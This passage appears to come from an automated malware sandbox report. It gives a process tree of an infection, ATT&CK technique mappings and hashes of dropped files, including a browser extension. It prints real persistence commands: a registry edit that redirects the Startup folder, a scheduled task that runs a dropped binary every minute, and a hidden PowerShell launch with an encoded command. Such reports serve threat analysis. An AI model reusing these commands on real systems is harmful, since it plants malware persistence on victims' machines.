"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\
5⤵
PID:5972

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\
6⤵
PID:6232

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN orxds.exe /TR "C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe" /F
5⤵
- Creates scheduled task(s)
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 1116
4⤵
- Program crash
PID:4560

C:\Users\Admin\Pictures\Adobe Films\WFRlKKegZgYtber0AgOsrPem.exe
"C:\Users\Admin\Pictures\Adobe Films\WFRlKKegZgYtber0AgOsrPem.exe"
3⤵
PID:5860

C:\Users\Admin\Pictures\Adobe Films\SQIYz1SYQpw0iziOYZiov6mD.exe
"C:\Users\Admin\Pictures\Adobe Films\SQIYz1SYQpw0iziOYZiov6mD.exe"
3⤵
PID:6104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:4888

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:4672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:5160

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:4048

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:7064

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:4852

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:2420

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:4012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:6552

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:768

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:6396

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 1
4⤵
PID:7036

C:\Windows\SysWOW64\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:7052

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4284

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
PID:4564

C:\Users\Admin\AppData\Local\Temp\Details.exe
"C:\Users\Admin\AppData\Local\Temp\Details.exe"
2⤵
- Executes dropped EXE
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 620
3⤵
- Program crash
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 640
3⤵
- Program crash
PID:5432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 744
3⤵
- Program crash
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 636
3⤵
- Program crash
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 816
3⤵
- Program crash
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 1052
3⤵
- Program crash
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 1072
3⤵
- Program crash
PID:4560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 1276
3⤵
- Program crash
PID:6564

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4344

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:2648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 600
3⤵
- Program crash
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2648 -ip 2648
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4504 -ip 4504
1⤵
PID:5896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5560 -ip 5560
1⤵
PID:6000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4504 -ip 4504
1⤵
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5756 -ip 5756
1⤵
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4504 -ip 4504
1⤵
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5560 -ip 5560
1⤵
PID:5488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4504 -ip 4504
1⤵
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5560 -ip 5560
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4504 -ip 4504
1⤵
PID:5276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5560 -ip 5560
1⤵
PID:2804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4504 -ip 4504
1⤵
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5560 -ip 5560
1⤵
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5548 -ip 5548
1⤵
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4504 -ip 4504
1⤵
PID:1968

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:4832

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:6148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6148 -s 604
3⤵
- Program crash
PID:6284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5560 -ip 5560
1⤵
PID:6160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6148 -ip 6148
1⤵
PID:6224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5700 -ip 5700
1⤵
PID:6360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4504 -ip 4504
1⤵
PID:6460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5560 -ip 5560
1⤵
PID:6556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5700 -ip 5700
1⤵
PID:6892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5700 -ip 5700
1⤵
PID:7072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5560 -ip 5560
1⤵
PID:1968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5420 -ip 5420
1⤵
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5700 -ip 5700
1⤵
PID:6236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5436 -ip 5436
1⤵
PID:6252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5560 -ip 5560
1⤵
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5700 -ip 5700
1⤵
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5700 -ip 5700
1⤵
PID:6156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5596 -ip 5596
1⤵
PID:6212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5700 -ip 5700
1⤵
PID:6284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5700 -ip 5700
1⤵
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5700 -ip 5700
1⤵
PID:6628

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\background.html
Filesize
786B

MD5
9ffe618d587a0685d80e9f8bb7d89d39

SHA1
8e9cae42c911027aafae56f9b1a16eb8dd7a739c

SHA256
a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e

SHA512
a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\icon.png
Filesize
6KB

MD5
c8d8c174df68910527edabe6b5278f06

SHA1
8ac53b3605fea693b59027b9b471202d150f266f

SHA256
9434dd7008059a60d6d5ced8c8a63ab5cae407e7152da98ca4dda408510f08f5

SHA512
d439e5124399d1901934319535b7156c0ca8d76b5aa4ddf1dd0b598d43582f6d23c16f96be74d3cd5fe764396da55ca51811d08695f356f12f7a8a71bcc7e45c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js
Filesize
13KB

MD5
4ff108e4584780dce15d610c142c3e62

SHA1
77e4519962e2f6a9fc93342137dbb31c33b76b04

SHA256
fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a

SHA512
d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js
Filesize
15KB

MD5
7acc90859b8fad112682a0669c4b0ce5

SHA1
3f8f1b385e55a055fb67a29f1cbb019368eddf30

SHA256
5195be0d844d3c4aaffbf9ab2cb0fbb1788305df3dbffdff242586a3e4e3f2b4

SHA512
eaed68db6dea568db19453b4c44fe0ca889aa7ea487f48b7f25c31050f1067853a5746954f37e129b1ac682a9ac17fa012a0976fd627c65411b06341811ed31c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js
Filesize
14KB

MD5
e49ff8e394c1860bc81f432e7a54320a

SHA1
091864b1ce681b19fbd8cffd7191b29774faeb32

SHA256
241ee3cf0f212f8b46ca79b96cfa529e93348bf78533d11b50db89e416bbabf3

SHA512
66c31c7c5409dfdb17af372e2e60720c953dd0976b6ee524fa0a21baaf0cf2d0b5e616d428747a6c0874ec79688915b731254de16acce5d7f67407c3ef82e891

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js
Filesize
84KB

MD5
a09e13ee94d51c524b7e2a728c7d4039

SHA1
0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae

SHA256
160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef

SHA512
f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js
Filesize
604B

MD5
23231681d1c6f85fa32e725d6d63b19b

SHA1
f69315530b49ac743b0e012652a3a5efaed94f17

SHA256
03164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a

SHA512
36860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js
Filesize
268B

MD5
0f26002ee3b4b4440e5949a969ea7503

SHA1
31fc518828fe4894e8077ec5686dce7b1ed281d7

SHA256
282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d

SHA512
4290a1aee5601fcbf1eb2beec9b4924c30cd218e94ae099b87ba72c9a4fa077e39d218fc723b8465d259028a6961cc07c0cd6896aa2f67e83f833ca023a80b11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json
Filesize
1KB

MD5
9d21061c0fde598f664c196ab9285ce0

SHA1
b8963499bfb13ab67759048ed357b66042850cd4

SHA256
024872f1e0eb6f98dcbd6a9d47820525c03aa0480373f9e247a90a3ef8776514

SHA512
f62d333e6415be772751eeeaf154dc49012b5fc56b0d2d6276a099d658ebe10f3c5166ec02b215ae9cd05014d7435b53d14b98a20e2af83a7aa09a8babe71853

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
31KB

MD5
9293625eada67902da47fbf28c0091e8

SHA1
78dad17ace9ea7775d287be2a000adab2318590c

SHA256
8d92dfd0e456806d8bc92766403284f80a2ab995b252683dfa8c6f8af76ceab6

SHA512
1b99d35acdf9f494a2a49b1659009ecc47728925419ee2ec8a959e4eaa3abd38cf76e47891534609569b6cc3d6769ad19fcb0788a4164aabedeb2e73eff47353

Download Submit
C:\Users\Admin\AppData\Local\Temp\Details.exe
Filesize
224KB

MD5
913fcca8aa37351d548fcb1ef3af9f10

SHA1
8955832408079abc33723d48135f792c9930b598

SHA256
2f59e661904f9a4c62123f024eb7968cdc234f826bab077914ad8896ebf001c9

SHA512
0283e875dfbc7b04eb5ce5a82e66fb99e945626ed7e2ed4f2bc90e54e4ef99c065e2f98464f0aec24c921bae020ff3a6f1b3a01bfd8bdcea8459113670519c2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Details.exe
Filesize
224KB

MD5
913fcca8aa37351d548fcb1ef3af9f10

SHA1
8955832408079abc33723d48135f792c9930b598

SHA256
2f59e661904f9a4c62123f024eb7968cdc234f826bab077914ad8896ebf001c9

SHA512
0283e875dfbc7b04eb5ce5a82e66fb99e945626ed7e2ed4f2bc90e54e4ef99c065e2f98464f0aec24c921bae020ff3a6f1b3a01bfd8bdcea8459113670519c2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
Filesize
426KB

MD5
ece476206e52016ed4e0553d05b05160

SHA1
baa0dc4ed3e9d63384961ad9a1e7b43e8681a3c5

SHA256
ebc2784e2648e4ff72f48a6251ff28eee69003c8bd4ab604f5b43553a4140f4b

SHA512
2b51d406c684a21ad4d53d8f6c18cbc774cf4eacae94f48868e7ac64db1878792840fc3eea9bb27f47849b85382604492400e60b0f9536cf93ca78d7be7c3b3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
Filesize
426KB

MD5
ece476206e52016ed4e0553d05b05160

SHA1
baa0dc4ed3e9d63384961ad9a1e7b43e8681a3c5

SHA256
ebc2784e2648e4ff72f48a6251ff28eee69003c8bd4ab604f5b43553a4140f4b

SHA512
2b51d406c684a21ad4d53d8f6c18cbc774cf4eacae94f48868e7ac64db1878792840fc3eea9bb27f47849b85382604492400e60b0f9536cf93ca78d7be7c3b3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
Filesize
1.3MB

MD5
37db6db82813ddc8eeb42c58553da2de

SHA1
9425c1937873bb86beb57021ed5e315f516a2bed

SHA256
65302460bbdccb8268bc6c23434bcd7d710d0e800fe11d87a1597fdedfc2a9c7

SHA512
0658f3b15a4084ae292a6c0640f4e88fe095a2b2471633ca97c78998ee664631156e9cea1bee3d5ac5428ca600c52495437468770fbda6143e11651e797298c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
Filesize
1.3MB

MD5
37db6db82813ddc8eeb42c58553da2de

SHA1
9425c1937873bb86beb57021ed5e315f516a2bed

SHA256
65302460bbdccb8268bc6c23434bcd7d710d0e800fe11d87a1597fdedfc2a9c7

SHA512
0658f3b15a4084ae292a6c0640f4e88fe095a2b2471633ca97c78998ee664631156e9cea1bee3d5ac5428ca600c52495437468770fbda6143e11651e797298c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
Filesize
712KB

MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
Filesize
712KB

MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
Filesize
712KB

MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
Filesize
153KB

MD5
849b899acdc4478c116340b86683a493

SHA1
e43f78a9b9b884e4230d009fafceb46711125534

SHA256
5f5eed76da09dc92090a6501de1f2a6cc7fb0c92e32053163b28f380f3b06631

SHA512
bdff9dbac1de6e1af7807a233c4e8c36ae8c45e0b277d78b636124b6ffe0df6ed16c78f2f3222eeb383501b2f3eec90c8736da540017b8b35592fa49eb3f720c

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
Filesize
153KB

MD5
849b899acdc4478c116340b86683a493

SHA1
e43f78a9b9b884e4230d009fafceb46711125534

SHA256
5f5eed76da09dc92090a6501de1f2a6cc7fb0c92e32053163b28f380f3b06631

SHA512
bdff9dbac1de6e1af7807a233c4e8c36ae8c45e0b277d78b636124b6ffe0df6ed16c78f2f3222eeb383501b2f3eec90c8736da540017b8b35592fa49eb3f720c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
Filesize
4.5MB

MD5
7c20b40b1abca9c0c50111529f4a06fa

SHA1
5a367dbc0473e6f9f412fe52d219525a5ff0d8d2

SHA256
5caae6f11abc0a10481f56f9e598f98332b6144e24bf6efa67b63becc7debd36

SHA512
f1afdb5d0c396e4929dfc22f205079cdbea2eccbd19c90c20cc87990c0cb11f29f392eb62e9218341965c4358e79b5d7f8ee216eba915f712a6d3578e1818473

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
Filesize
4.5MB

MD5
7c20b40b1abca9c0c50111529f4a06fa

SHA1
5a367dbc0473e6f9f412fe52d219525a5ff0d8d2

SHA256
5caae6f11abc0a10481f56f9e598f98332b6144e24bf6efa67b63becc7debd36

SHA512
f1afdb5d0c396e4929dfc22f205079cdbea2eccbd19c90c20cc87990c0cb11f29f392eb62e9218341965c4358e79b5d7f8ee216eba915f712a6d3578e1818473

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
Filesize
4.5MB

MD5
7c20b40b1abca9c0c50111529f4a06fa

SHA1
5a367dbc0473e6f9f412fe52d219525a5ff0d8d2

SHA256
5caae6f11abc0a10481f56f9e598f98332b6144e24bf6efa67b63becc7debd36

SHA512
f1afdb5d0c396e4929dfc22f205079cdbea2eccbd19c90c20cc87990c0cb11f29f392eb62e9218341965c4358e79b5d7f8ee216eba915f712a6d3578e1818473

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize
1.4MB

MD5
deeb8730435a83cb41ca5679429cb235

SHA1
c4eb99a6c3310e9b36c31b9572d57a210985b67d

SHA256
002f4696f089281a8c82f3156063cee84249d1715055e721a47618f2efecf150

SHA512
4235fa18fcc183ef02a1832790af466f7fdeda69435ebc561cb11209e049e890917b2c72be38fa8e1039493ae20fdbbe93776895b27a021d498f81d3e00c7379

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
Filesize
1.4MB

MD5
deeb8730435a83cb41ca5679429cb235

SHA1
c4eb99a6c3310e9b36c31b9572d57a210985b67d

SHA256
002f4696f089281a8c82f3156063cee84249d1715055e721a47618f2efecf150

SHA512
4235fa18fcc183ef02a1832790af466f7fdeda69435ebc561cb11209e049e890917b2c72be38fa8e1039493ae20fdbbe93776895b27a021d498f81d3e00c7379

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
Filesize
359KB

MD5
3d09b651baa310515bb5df3c04506961

SHA1
e1e1cff9e8a5d4093dbdabb0b83c886601141575

SHA256
2599fed90469c6c2250883f90d1c9d20fe41755b9da670a306a884797dbd7df6

SHA512
8f8499c73297be7c1743361dfcb352a3ce93aca4e81c0355f1814f9eedf92d22b40104d32eb4dbd776ccc9051613eee9b8ff57178c6240a787815e0dc8dc6889

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
Filesize
359KB

MD5
3d09b651baa310515bb5df3c04506961

SHA1
e1e1cff9e8a5d4093dbdabb0b83c886601141575

SHA256
2599fed90469c6c2250883f90d1c9d20fe41755b9da670a306a884797dbd7df6

SHA512
8f8499c73297be7c1743361dfcb352a3ce93aca4e81c0355f1814f9eedf92d22b40104d32eb4dbd776ccc9051613eee9b8ff57178c6240a787815e0dc8dc6889

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dat
Filesize
552KB

MD5
5fd2eba6df44d23c9e662763009d7f84

SHA1
43530574f8ac455ae263c70cc99550bc60bfa4f1

SHA256
2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f

SHA512
321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
Filesize
73KB

MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
Filesize
73KB

MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\CrashpadMetrics-active.pma
Filesize
1024KB

MD5
03c4f648043a88675a920425d824e1b3

SHA1
b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d

SHA256
f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450

SHA512
2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

Download Submit
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad\settings.dat
Filesize
40B

MD5
05f92457cba4d4aa36ffe12861c0269c

SHA1
5b609d699027402621e9e55297c8af134cde1960

SHA256
aa5f623f50ade96edd47f486199f43e1250eb62c44eede7ee850c3de61ed1707

SHA512
da69735ad2e043b889dde257e600cc53866fff6010bdc61da0d35b6a6f4c5fd2a61f778bb178c6856a7f473695adb71478a8a0ee3f9ec7df86a9f4c54e14c9f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Favicons
Filesize
20KB

MD5
5688ce73407154729a65e71e4123ab21

SHA1
9a2bb4125d44f996af3ed51a71ee6f8ecd296bd7

SHA256
be1b822e970dfe1a120d248db7000eaf799bd6531929a1308676c70fe1608d60

SHA512
eb6452b23ea36c39d03ead154185616c13583f12f382cb2456beeb1ba6e5febdfd2a6f1064283cf115ad1c517dbf409777cdacb128e00c9d3f401335db355537

Download Submit
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\History
Filesize
116KB

MD5
4e2922249bf476fb3067795f2fa5e794

SHA1
